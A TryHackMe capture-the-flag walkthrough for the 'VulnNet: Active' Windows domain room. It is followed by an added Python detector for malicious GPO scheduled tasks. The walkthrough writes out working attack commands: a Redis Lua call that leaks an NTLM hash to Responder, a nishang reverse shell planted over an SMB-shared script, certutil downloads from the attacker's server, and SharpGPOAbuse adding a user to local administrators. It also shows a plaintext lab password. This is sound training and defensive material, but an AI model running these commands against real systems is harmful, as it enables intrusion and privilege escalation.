VulnNet: Active

Room Link: https://tryhackme.com/r/room/vulnnetactive

Scans

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/139 - NetBIOS

Kali

nbtscan $VICTIM

Kali

enum4linux $VICTIM

TCP/445 - SMB

No results. Couldn't log in anonymously.

Kali

smbclient -L //$VICTIM/ 

TCP/6379 - Redis

Added active.thm

Kali

redis-cli -h active.thm

Kali(redis-cli)

config get *

Kali

responder -I ens5 -dvw  

Kali(redis-cli)

eval "dofile('//$KALI/share')" 0

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

TCP/445 - SMB

Kali

smbclient -L //$VICTIM/ -U enterprise-security
Password: sand_0873959498

Download files

Kali

smbclient \\\\$VICTIM\\Enterprise-Share -U enterprise-security
Password: sand_0873959498

Kali(smbclient)

ls
mget *

Kali

cat PurgeIrrelevantData_1826.ps1

Initial Shell

Kali

git clone https://github.com/samratashok/nishang.git
cd nishang/Shells/
subl Invoke-PowerShellTcp.ps1

Kali(subl)

Invoke-PowerShellTcp -Reverse -IPAddress $KALI -Port 4444

Kali

cp Invoke-PowerShellTcp.ps1 PurgeIrrelevantData_1826.ps1

Upload payload

Kali(smbclient)

put PurgeIrrelevantData_1826.ps1

After a few moments we get a connection

Kali

rlwrap nc -lvnp 4444

Privilege Escalation

Download SharpHound PS1

This failed because when running the script it would just hang and I had to reset the server. So afterwards I tried with the exe.

Kali

git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.ps1 .
python2 -m SimpleHTTPServer 82

Victim(Powershell)

certutil -urlcache -f http://$KALI:82/SharpHound.ps1 SharpHound.ps1
powershell -ep bypass
.\SharpHound.ps1 

Download SharpHound EXE

Kali

git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.exe .
python2 -m SimpleHTTPServer 82

Victim(Powershell)

certutil -urlcache -f http://$KALI:82/SharpHound.exe SharpHound.exe
.\SharpHound.exe

Transfer results to Kali

Victim(Powershell)

copy 20240405092615_BloodHound.zip C:\Enterprise-Share\

Kali(smbclient)

get 20240405092615_BloodHound.zip

BloodHound

Kali #1

neo4j console

Kali #2

bloodhound --no-sandbox

We can just drag the zip file into BloodHound to import it.

Find Shortest Paths to Domain Admins

Our user enterprise-security has write access to the GPO called "SECURITY-POL-VN".

SharpGPOAbuse

Kali

git clone https://github.com/byronkg/SharpGPOAbuse.git
cp SharpGPOAbuse/SharpGPOAbuse-master/SharpGPOAbuse.exe .
python2 -m SimpleHTTPServer 82

Victim(Powershell)

certutil -urlcache -f http://$KALI:82/SharpGPOAbuse.exe SharpGPOAbuse.exe

The task runs a single command, which adds our user enterprise-security to the local administrators group.

Victim(Powershell)

 .\SharpGPOAbuse.exe --AddComputerTask --TaskName "privesc" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"

After the change is successful, we just need to push the GPO for it to take effect.

Victim(Powershell)

 gpupdate /force

Kali

psexec.py enterprise-security:sand_0873959498@$VICTIM
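
Detection side of the GPO step above, as an added example that is not part of the original writeup: a computer task added to a GPO is stored as XML in that GPO's SYSVOL folder, so a defender can parse the file and flag immediate tasks or commands that change group membership. The XML below is a constructed, simplified sample (its layout is an assumption), and audit_gpo_tasks and RULES are hypothetical names.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample (not taken from the room): simplified layout of a GPO's
# Machine\Preferences\ScheduledTasks\ScheduledTasks.xml; the layout is an assumption.
SAMPLE_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="privesc"><Properties action="C" name="privesc" runAs="NT AUTHORITY\System">
    <Task version="1.3">
      <RegistrationInfo><Author>vulnnet\administrator</Author></RegistrationInfo>
      <Actions><Exec>
        <Command>cmd.exe</Command>
        <Arguments>/c net localgroup administrators enterprise-security /add</Arguments>
      </Exec></Actions>
    </Task>
  </Properties></ImmediateTaskV2>
  <TaskV2 name="defrag"><Properties action="U" name="defrag" runAs="NT AUTHORITY\System">
    <Task version="1.3"><Actions><Exec>
      <Command>defrag.exe</Command><Arguments>C: /O</Arguments>
    </Exec></Actions></Task>
  </Properties></TaskV2>
</ScheduledTasks>"""

# Command-line patterns that change accounts or group membership.
RULES = [
    ("group membership change", re.compile(r"\bnet1?(\.exe)?\s+(localgroup|group)\b.*\s/add\b", re.I)),
    ("account creation", re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/add\b", re.I)),
    ("group membership change", re.compile(r"\bAdd-(LocalGroupMember|ADGroupMember)\b", re.I)),
]

def audit_gpo_tasks(xml_text):
    """Return one finding per task action that is immediate or matches a rule."""
    findings = []
    for task in ET.fromstring(xml_text):            # ImmediateTaskV2, TaskV2, ...
        props = task.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        for exe in task.iter("Exec"):
            parts = [(exe.findtext(tag) or "").strip() for tag in ("Command", "Arguments")]
            cmdline = " ".join(p for p in parts if p)
            reasons = sorted({label for label, rx in RULES if rx.search(cmdline)})
            if task.tag.startswith("Immediate"):
                reasons.append("immediate task (runs at next policy refresh)")
            if reasons:
                findings.append({"task": task.get("name"), "run_as": run_as, "cmdline": cmdline,
                                 "author": task.findtext(".//Author"), "reasons": reasons})
    return findings

if __name__ == "__main__":
    print(*audit_gpo_tasks(SAMPLE_XML), sep="\n")
```

Run against the ScheduledTasks.xml files under SYSVOL, a finding on a GPO that a non-admin account can write to (as BloodHound showed for SECURITY-POL-VN) is the case to review first.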
